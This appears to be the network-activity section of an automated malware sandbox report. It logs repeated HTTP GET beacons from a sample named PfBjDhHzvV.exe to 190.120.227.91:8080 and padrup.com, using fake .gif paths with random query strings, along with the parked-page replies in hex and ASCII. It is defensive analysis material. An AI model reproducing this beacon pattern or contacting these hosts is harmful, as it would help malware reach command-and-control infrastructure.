                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525407076 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:17 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_TSHdJDoe6UkX0DAnORCM0UErDlExFTps/5R6cihPpuKLYvE6euzMURaNxLZ6qdYOycxdoKs3gVX32CQgp8f60g==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 38 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525459051 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE1Ny4xODQ3OjM4ZDU4NWYzMzZhZjU4OGNjNzdkOGEzM2RiNzg4MTRjYjlkMDNhMjE1Y2ZlZTAwNjhiNzIzNTYwMjNkZTlkYzQ6NjcxMjEwYTUyZDE3NQ==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525495052 CEST757INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  23192.168.2.762517190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567866087 CEST168OUTGET /sobakavolos.gif?7ca48dd=653487185 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  24192.168.2.762518185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822299004 CEST155OUTGET /sobaka1.gif?87df311=569887812 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899507046 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:22 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_BF8xvDt7Lyf1suO1SiQMp3H1wIvYeZpEZhiu9posc0Z5+P2ygFUdhoLV1cMdKgg2Wy9cnkx5OpRnPvzEEEsMlw==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899549007 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE2Mi41NDk1OmRiMzU3NGNjNWJkZjNjYTIwYjE5YWY3MDY5ODk1MTRlOTRlNTQwNDI2ZDYyYTBhY2FlN2YyNmQ3ZjgxMTU4YWM6NjcxMjEwYWE4NjI2OQ==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899584055 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899880886 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 61 65 33 63 32 38 62 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 146ae3c28b');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  25192.168.2.762519190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919814110 CEST169OUTGET /sobakavolos.gif?9db5459=1322951368 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  26192.168.2.762521185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.229074955 CEST157OUTGET /sobaka1.gif?f24e375=-2008285411 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305110931 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:28 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FNPF0dllY67EK+7EzC7HQasHvDZprzLQD2mrCpYqW53q6xXea/+V1xcCPq1538qi44pU8L/PAeeuac/5/mm0fQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 66 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1f7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305144072 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE2Ny45NTUxOmNiNTc2ZDA1M2Y3NzU0MjA0YjZkOGFjZjI5YTQ5MWU3NzMwOTY4NGE1ZGY2YzIyYmY5OTgxOGVjNDAzMzI0ZjI6Njc6e2xMjEwYWZlOTJ
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305160999 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                  Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  27192.168.2.762522190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.339416981 CEST170OUTGET /sobakavolos.gif?10aef23e=1959305138 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  28192.168.2.762524185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.683916092 CEST156OUTGET /sobaka1.gif?158b8302=722929156 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728588104 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:33 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_AlMf8llvldCGFY2bQOPMXIXNRmgKI6+oyZlVSwl9q6yIpS0Z8Gxul35O68Xt6+pRedcfq+c2i+aXYGbBzhz5SA==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728744984 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE3My4zOTIzOjlkNDA5ZTg1ZjNiMmM0YzhiZWY2N2Q3ODNlMmY5MzIzYTRlYzQ2N2ZjODA0NjFmMjg2Nzc1YmQwZGU4NmJlMWU6NjcxMjEwYjU1ZmM5MA==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728761911 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728775978 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 38 30 38 32 38 66 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 14680828fd');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  29192.168.2.762525190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.750663996 CEST170OUTGET /sobakavolos.gif?167a9d17=1508537436 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  30192.168.2.762526185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.152611017 CEST157OUTGET /sobaka1.gif?1bfc4aa7=-538815176 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248230934 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:39 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_YwUokgUnz0TKJPiB3MyN5xsobouFEmmk0H2oAt9MXBwc8rB5BF34Pp6J2aUd2reHw+pyCoJBi0jcAIQELbVXhA==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
